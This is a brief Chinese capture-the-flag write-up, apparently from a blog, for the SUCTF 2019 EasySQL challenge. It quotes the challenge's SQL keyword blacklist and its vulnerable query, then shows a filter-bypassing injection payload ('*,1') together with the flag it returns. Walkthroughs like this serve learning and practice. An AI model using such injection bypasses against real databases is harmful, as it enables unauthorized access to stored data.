都被过滤,查看公开的源码
黑名单 :
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
查询语句:
select $_GET['query'] || flag from flag
两种方法
都是神乎其神的网友大佬想到的
1、由于没有过滤*所以可以直接构造payload
payload: *,1
查询flag
拼接之后的语句为
select *,1 || flag from flag
先查找全部 [0] => flag{fd583590-4eef-4964-8fe5-ecd4ad6411e5}
,然后在查找1 [1] => 1
[SUCTF 2019]EasySQL(set sql_mode=pipes_as_concat修改||)
最新推荐文章于 2023-11-28 09:37:00 发布